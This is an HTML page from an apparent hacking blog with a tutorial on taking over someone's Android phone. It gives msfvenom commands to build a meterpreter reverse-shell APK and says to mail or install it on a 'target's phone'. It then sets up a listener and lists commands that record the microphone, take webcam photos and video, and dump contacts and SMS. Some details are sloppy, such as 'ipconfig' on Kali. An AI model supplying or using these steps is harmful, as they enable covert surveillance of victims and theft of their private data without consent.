<html>
<head>
  <title>Kali Lniux - How To Hack Any Android Phone | Hackism.net</title>
  <meta charset="UTF-8">
  <meta name="keywords" content="Hackism, hackism.net, sqli, xss, hackers, hack, ddos, deface, cyber, anon, anonymous, HTML, CSS, XML, XHTML, JavaScript">
  <meta name="author" content="Aayush Agarwal">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="shortcut icon" href="img/fav.ico" type="image/x-icon" />
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.3/css/font-awesome.min.css">
  <link rel="stylesheet" href="css/tuts.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  <link href="https://fonts.googleapis.com/css?family=Josefin+Sans:300i" rel="stylesheet"> 
  <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/angularjs/1.0.7/angular.min.js"></script>
</head>

<body>

<nav class="navbar navbar-inverse navbar-fixed-top" role="navigation">
 <div class="container" style="padding-right: 15px; padding-left: 15px; margin-right: auto; margin-left: auto;">
  <div class="navbar-header">
    <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
    </button>    
    <a class="navbar-brand" href="http://hackism.net">Hackism</a>
  </div>
  <div class="navbar-collapse collapse">
    <ul class="nav navbar-nav navbar-right">
      <li><a href="../index.html">Home</a></li>
      <li><a href="index.html">Tutorials</a></li>
    </ul>
  </div>
 </div>
</nav>




<div class="jumbotron">
<div  style="margin-top: 2%;">
 <h1>hacking blog,<br>because we love reading.</h1>
 <hr width="90%">
</div>
</div>

<div class="container">

<div class="col-md-12 text-center" style="background-color: #FF5050; color: #fff; padding: 5px;">
<b>NOTE : this article is for educational purpose only<br>we are not responsible for any acts.</b>
</div>

<!--edit-->

<div class="col-sm-9 col-md-6 col-lg-8" style="background-color:#fff;">
<h2 class="text-center">Kali Lniux : How To Hack Any Android Phone</h2><hr>

<!--image-->
<img src="img/tuts/kali.png" class="img-responsive">


<!--required-->
<h4>so what you require?</h4>
<p>
 <ul>
  <li>kali linux</li>
  <li>msfvenom (kali tool)</li>
  <li>basic knowledge about kali lniux</li>
 </ul>
</p><br>
 
<!--tut starts-->

<h4>how it works :</h4>
 
some information about tutorial

<h4>So lets start :</h4>

Fire Up kali and open terminal.<br>
run the following commands

<pre>msfvenom -p android/meterpreter/reverse_tcp  LHOST=YOUR IP LPORT=4444 R > hackism.apk </pre>

To know your IP, open new terminal and type

<pre>ipconfig</pre>

Your apk file will be saved in the Home folder.<br>
now mail or install the apk file on target's phone<br>
after the apk file is installed on the target's phone, open msfconsole by typing

<pre>msfconsole</pre>

after opening msfconsole, type these bunch of codes :

<pre>use multi/handler</pre>

<pre>set payload android/meterpreter/reverse_tcp</pre>

<pre>set LHOST Your IP</pre>

<pre>set LPORT 4444</pre>

then payload handler will be started,<br>
congrats you have hacked your target's phone :-D<br>
some exploits you may try :<br>
record the voices 

<pre>record_mic</pre>

take a picture

<pre>webcam_snap</pre>

make a video

<pre>webcam_stream</pre>

get call history

<pre>dump_contacts</pre>

get SMS chats

<pre>dump_sms</pre>

<b>if you are facing any errors, contact us. we will make a tutorial for fixes</b>


<hr>

<!--author-->

<div class="author">
  <blockquote>How To Hack Android Tutorial<small style="text-align:right;">by aayush.</small></blockquote>
</div>



</div> <!--left div end-->


<!--ads-->


<div class="col-sm-3 col-md-6 col-lg-4" style="background-color:#333;">
<img src="img/ads1.png" width="100%">
</div>
<div class="col-sm-3 col-md-6 col-lg-4" style="background-color:#333;">
<img src="img/ads2.png" width="100%">
</div>
<div class="col-sm-3 col-md-6 col-lg-4" style="background-color:#333;">
<img src="img/ads3.png" width="100%">
</div>

</div> <!--container-fluid end-->


<!--footer-->
<br>
<footer class="container-fluid">
 <center>       
  <div style="font-size: 30px;">
   <a href="https://www.facebook.com"><i class="fa fa-facebook-official" aria-hidden="true"></i></a>
   <a href="https://www.twitter.com"><i class="fa fa-twitter-square" aria-hidden="true"></i></a>
   <a href="https://www.linkedin.com"><i class="fa fa-linkedin-square" aria-hidden="true"></i></a>
  </div>       
  <div class="text-center" style="font-size: 15px;">
   <a href="#">terms & conditions</a>&nbsp;
   <a href="#">privacy policy</a>&nbsp;
   <a href="#">contact us</a>&nbsp;
  </div>
   <p style="margin: 5px;">Hackism Technologies &copy 2016</p>
 </center>
</footer>



</body>
</html>